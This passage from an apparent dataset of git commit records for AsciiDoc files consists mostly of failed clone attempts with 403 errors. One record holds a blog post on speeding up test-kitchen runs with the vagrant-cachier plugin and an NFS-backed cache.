http:\/\/gerrit.cloudera.org:8080\/7840\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\nReviewed-by: Dan Burkert <4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\nTested-by: Dan Burkert 
<4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\n","repos":"helifu\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dc1bfb499247d741ac9dc8dbc56daa58e40dd4e2","subject":"Create jme3_ai.adoc","message":"Create jme3_ai.adoc\n\nFirst pass at AI page for wiki.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3_ai.adoc","new_file":"src\/docs\/asciidoc\/jme3_ai.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"0307cf73c62c4bb0c1f60f944be513dbec503284","subject":"improved documentation","message":"improved documentation\n","repos":"smiklosovic\/ZeroPush-java","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smiklosovic\/ZeroPush-java.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2a32a42c6efff40469f4b10fdd06b6c314e6e6c","subject":"added travis ci build status","message":"added travis ci build status\n","repos":"ahus1\/saltconsul-examples,ahus1\/saltconsul-examples,ahus1\/saltconsul-examples","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahus1\/saltconsul-examples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"18c9be65d71152085981b4ea2ee54eb2146ef8b7","subject":"dump of lecture #8 notes: layering & UDP","message":"dump of lecture #8 notes: layering & UDP","repos":"jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405","old_file":"lecture08_20171002.adoc","new_file":"lecture08_20171002.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/netwtcpip-cmp405.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e48d66af8d2c2b8a0843bd3c809b1169c2553c4","subject":"Update 2017-03-15-Building-a-highly-available-Ansible-Tower-cluster.adoc","message":"Update 
2017-03-15-Building-a-highly-available-Ansible-Tower-cluster.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-03-15-Building-a-highly-available-Ansible-Tower-cluster.adoc","new_file":"_posts\/2017-03-15-Building-a-highly-available-Ansible-Tower-cluster.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdbb73e9d6fef880fc3d20902a81f87b4a4c2271","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94bda8e902313d13b60fa4d2f4d518ed4bb82dc3","subject":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","message":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"017c30154a2eb1965e5cc2ec484e43001240bf0e","subject":"Update 2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","message":"Update 2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","new_file":"_posts\/2016-04-15-Seguridad-Personal-protejase-usted-mismo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"623e7f5964295c3775c80d2189c6ffa803b64eee","subject":"y2b create post Apple Is Deliberately Slowing Down Your iPhone","message":"y2b create post Apple Is Deliberately Slowing Down Your iPhone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-23-AppleIsDeliberatelySlowingDownYouriPhone.adoc","new_file":"_posts\/2017-12-23-AppleIsDeliberatelySlowingDownYouriPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb9827904271d0884bb574a8cb1a4abae30457d1","subject":"Create Windows.adoc","message":"Create 
Windows.adoc","repos":"igagis\/morda,igagis\/morda,igagis\/morda","old_file":"wiki\/installation\/Windows.adoc","new_file":"wiki\/installation\/Windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/morda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"158038b149ba0d203b2fea638fe1d2735f48cb9d","subject":"y2b create post Razer Edge Pro Review (My final thoughts)","message":"y2b create post Razer Edge Pro Review (My final thoughts)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-18-Razer-Edge-Pro-Review-My-final-thoughts.adoc","new_file":"_posts\/2013-04-18-Razer-Edge-Pro-Review-My-final-thoughts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"174589827ae6c775acd52ce0e831dc5ece563d6f","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5224eee4457693429a3329fad68321022d07c480","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cec7c7c0acdb4b8305397195c4b0cc161a0e4c6","subject":"Update 2016-02-20-Caching-in-Kitchen.adoc","message":"Update 2016-02-20-Caching-in-Kitchen.adoc","repos":"amberry\/blog,amberry\/blog,amberry\/blog,amberry\/blog","old_file":"_posts\/2016-02-20-Caching-in-Kitchen.adoc","new_file":"_posts\/2016-02-20-Caching-in-Kitchen.adoc","new_contents":"= Caching in Kitchen\nAdam Berry <adam.m.berry@gmail.com>\n:hp-tags: test-kitchen, chef, vagrant\n\nIf you spend time in the development cycle for chef-cookbooks with \nhttp:\/\/kitchen.ci\/[test-kitchen], I bet you've spent significant time waiting for packages to \ndownload. The straw that broke this particular camel's back was having vpn performance issues, \nwhich really motivated me to find a solution.\n\nA small search later, and I came across the a plugin for https:\/\/www.vagrantup.com\/[Vagrant] \ncalled http:\/\/fgrehm.viewdocs.io\/vagrant-cachier\/[vagrant-cachier], which fit the bill perfectly\nwith only having to figure out how to wire it in to the vagrant setup that kitchen creates.\n\nThe easiest way to wire this in is to use the support for adding in extra Vagrantfiles from the\nhttps:\/\/github.com\/test-kitchen\/kitchen-vagrant#-vagrantfiles[kitchen-vagrant] driver. 
\nWith no further ado, here is the full list of things I did to get it working, all on OS X 10.11.3.\n\n== 1. Install the plugin\n\n`vagrant plugin install vagrant-cachier`\n\n== 2. Additional Vagrantfile\n\n[source,ruby]\n.VagrantPlugins.rb\n----\nVagrant.configure(\"2\") do |c|\n  if Vagrant.has_plugin?(\"vagrant-cachier\")\n    c.vm.provision \"shell\",\n      inline: \"mkdir -p \/tmp\/kitchen\/cache; chown -R vagrant:vagrant \/tmp\/kitchen\"\n    c.cache.scope = :box\n    c.cache.synced_folder_opts = {\n      type: :nfs,\n      nfs_export: false\n    }\n    c.cache.enable :generic, {\n      \"chef\" => { cache_dir: \"\/tmp\/kitchen\/cache\" },\n    }\n  end\nend\n----\n\nHere I used NFS because our base VirtualBox image doesn't include the guest additions, so an NFS\nsynced folder is the fastest additional thing to include to get caching to work.\n\nYum and gem caching came for free, because once the plugin is active it auto-detects the supported\npackage managers in the guest and enables their buckets by default.\n\n== 3. Set up nfsd on the host\n\nIf you are using NFS, as I did, edit `\/etc\/exports` to include a line for the IP addresses that your\nkitchen boxes will use, something like\n\n----\n\"\/Users\/[uid]\/.vagrant.d\/cache\" 10.10.10.0\/16\n----\n\nThis covers the IP space we configure for kitchen instances; adjust yours accordingly. You\ndon't need to start or stop any service; the OS and Vagrant take care of that.\n\n== 4. Edit `.kitchen.yml`\n\nThe final step is the extra changes you need in the kitchen configuration to bring this all\ntogether.\n\n----\ndriver:\n  name: vagrant\n  provision: true\n  network:\n    - ['private_network', {ip: '10.10.10.99'}]\n  vagrantfiles:\n    - VagrantPlugins.rb\n----\n\nThis assumes you placed VagrantPlugins.rb at the same level as the `.kitchen.yml`.\n\n== 5. Profit\n\nThis caches at the box level, so any time you use that box, it will use the same cache, greatly\nspeeding up subsequent runs.\n","old_contents":"","returncode":1,"stderr":"error: pathspec '_posts\/2016-02-20-Caching-in-Kitchen.adoc' did not match any file(s) known to git\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4ef2592b145bf675bab92b078c0d61e767a73a6","subject":"Update 2017-01-11-ZEIGEN-UBER-UMWEGE.adoc","message":"Update 2017-01-11-ZEIGEN-UBER-UMWEGE.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-01-11-ZEIGEN-UBER-UMWEGE.adoc","new_file":"_posts\/2017-01-11-ZEIGEN-UBER-UMWEGE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9e28c25ee8d9d409f5b77cf9734bb6914400766","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa5e5e7c186a80503c49d68dd7ae0bc5406bb2f4","subject":"y2b create post They Call It The Bass Egg...","message":"y2b create post They Call It The Bass 
Egg...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-13-They-Call-It-The-Bass-Egg.adoc","new_file":"_posts\/2017-07-13-They-Call-It-The-Bass-Egg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d15685971f85c00e564b02d5426ba8796a7e4b50","subject":"Publish 2016-6-28-PHPER-authority-control-RBAC.adoc","message":"Publish 2016-6-28-PHPER-authority-control-RBAC.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-28-PHPER-authority-control-RBAC.adoc","new_file":"2016-6-28-PHPER-authority-control-RBAC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4edbca0cabfb017460262a0ccd529597aa98a017","subject":"replaced \"@LoggedIn User\" with \"Identity identity\"","message":"replaced \"@LoggedIn User\" with \"Identity identity\"\n\n@LoggedIn is not a real annotation, so the code examples can't be copy\/pasted and used.\r\nIt appears it can be this can be replaced with injecting an Identity type instead.\r\n\r\nDELTASPIKE-860\n","repos":"chkal\/deltaspike,struberg\/deltaspike,idontgotit\/deltaspike,idontgotit\/deltaspike,Danny02\/deltaspike,danielsoro\/deltaspike,mlachat\/deltaspike,rdicroce\/deltaspike,chkal\/deltaspike,struberg\/deltaspike,rdicroce\/deltaspike,Danny02\/deltaspike,rdicroce\/deltaspike,struberg\/deltaspike,os890\/DS_Discuss,os890\/deltaspike-vote,subaochen\/deltaspike,apache\/deltaspike,mlachat\/deltaspike,chkal\/deltaspike,os890\/DS_Discuss,subaochen\/deltaspike,idontgotit\/deltaspike,subaochen\/deltaspike,danielsoro\/deltaspike,idontgotit\/deltaspike,rdicroce\/deltaspike,apache\/deltaspike,Danny02\/deltaspike,os890\/DS_Discuss,danielsoro\/deltaspike,os890\/DS_Discuss,subaochen\/deltaspike,mlachat\/deltaspike,chkal\/deltaspike,Danny02\/deltaspike,apache\/deltaspike,os890\/deltaspike-vote,mlachat\/deltaspike,os890\/deltaspike-vote,danielsoro\/deltaspike,apache\/deltaspike,os890\/deltaspike-vote,struberg\/deltaspike","old_file":"documentation\/src\/main\/asciidoc\/security.adoc","new_file":"documentation\/src\/main\/asciidoc\/security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Danny02\/deltaspike.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5e008b9ea8c3adfa61c8e6d78865f4ac9c43b490","subject":"y2b create post Unboxing The World's Smallest 4G Smartphone","message":"y2b create post Unboxing The World's Smallest 4G Smartphone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-28-Unboxing-The-Worlds-Smallest-4G-Smartphone.adoc","new_file":"_posts\/2017-04-28-Unboxing-The-Worlds-Smallest-4G-Smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"f4a4ecc5efd9e20281fad26f9271ea74d68a1254","subject":"Update 2017-09-24-Backdoor-CTF-2017-Crypto.adoc","message":"Update 2017-09-24-Backdoor-CTF-2017-Crypto.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-24-Backdoor-CTF-2017-Crypto.adoc","new_file":"_posts\/2017-09-24-Backdoor-CTF-2017-Crypto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04042da1054cd2c426a9062b70f1f691c42294f3","subject":"Update 2019-02-22-docker-selenium-with-php.adoc","message":"Update 2019-02-22-docker-selenium-with-php.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-22-docker-selenium-with-php.adoc","new_file":"_posts\/2019-02-22-docker-selenium-with-php.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f000c30931e9ba57964e0f66a3ab6ccb2241e561","subject":"Add note about Groovy upgrade to upgrade guide","message":"Add note about Groovy upgrade to upgrade guide\n","repos":"blindpirate\/gradle,robinverduijn\/gradle,gradle\/gradle,robinverduijn\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,gradle\/gradle,robinverduijn\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,robinverduijn\/gradle,blindpirate\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gradle\/gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0d2201c0182e0545fbc516abc4869c4d7defe3e3","subject":"adding a workshop abstract","message":"adding a workshop abstract\n","repos":"arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop","old_file":"resources\/abstract.adoc","new_file":"resources\/abstract.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c3c26d70cbb220f187647d05e92689bffa8c769d","subject":":memo: fetch","message":":memo: fetch\n","repos":"syon\/refills","old_file":"src\/refills\/javascript\/fetch.adoc","new_file":"src\/refills\/javascript\/fetch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7dbf4abd330666aff26fa89db990a4f6b5b74d3b","subject":":memo: vuex","message":":memo: vuex\n","repos":"syon\/refills","old_file":"src\/refills\/vuejs\/vuex.adoc","new_file":"src\/refills\/vuejs\/vuex.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39ecdabb4766467fe33621c697a440180d6ad30e","subject":"Update 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","message":"Update 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_file":"_posts\/04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93c2d419409367b0c50fc02fd7b3aa8c94ceda0a","subject":"Update 2018-01-06-Onion-Omega-Temperatursensor.adoc","message":"Update 2018-01-06-Onion-Omega-Temperatursensor.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2018-01-06-Onion-Omega-Temperatursensor.adoc","new_file":"_posts\/2018-01-06-Onion-Omega-Temperatursensor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a92370fcc9f6d79b3e043188233b527bbb30d06","subject":"Convert Latex to AsciiDoc using with the following command","message":"Convert Latex to AsciiDoc using with the following command\n\n$ pandoc -f latex -t asciidoc -o umaka-score.adoc umaka-score.tex\n","repos":"dbcls\/umakadata,dbcls\/umakadata,dbcls\/umakadata,dbcls\/umakadata,level-five\/umakadata-1,level-five\/umakadata-1,level-five\/umakadata-1,level-five\/umakadata-1","old_file":"web\/docs\/umaka-score\/umaka-score.adoc","new_file":"web\/docs\/umaka-score\/umaka-score.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dbcls\/umakadata.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9332b0b4b630370f155c6347ea5a4759152d22c","subject":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","message":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19acc64763e9a1deea452307307a0bf97307ae79","subject":"Update 2017-09-21-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc","message":"Update 
2017-09-21-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-09-21-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc","new_file":"_posts\/2017-09-21-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"714adc535a489c504183ec18aaf7c3547b14f662","subject":"Update 2018-06-25-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-06-25-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf519d947194222a8575ae6231b61efb85f8419a","subject":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36e9a650f407c702759baea21439433ffcd9abe4","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"083ff01b6d9fe17baf4913855117ee76286f116e","subject":"Update 2015-12-23-Python-Method-Resolution-Order.adoc","message":"Update 2015-12-23-Python-Method-Resolution-Order.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-23-Python-Method-Resolution-Order.adoc","new_file":"_posts\/2015-12-23-Python-Method-Resolution-Order.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60cc1ac1469d7954ae9252f6933b229af0771d5d","subject":"Update 
2016-03-24-2016-Dates-announced-for-Mickeys-Not-So-Scary-Halloween-Party-and-Mickeys-Very-Merry-Christmas-Party.adoc","message":"Update 2016-03-24-2016-Dates-announced-for-Mickeys-Not-So-Scary-Halloween-Party-and-Mickeys-Very-Merry-Christmas-Party.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-24-2016-Dates-announced-for-Mickeys-Not-So-Scary-Halloween-Party-and-Mickeys-Very-Merry-Christmas-Party.adoc","new_file":"_posts\/2016-03-24-2016-Dates-announced-for-Mickeys-Not-So-Scary-Halloween-Party-and-Mickeys-Very-Merry-Christmas-Party.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e68960d54604b374f1cb84b842344f42a0198908","subject":"Added String dataformat docs to Gitbook","message":"Added String dataformat docs to 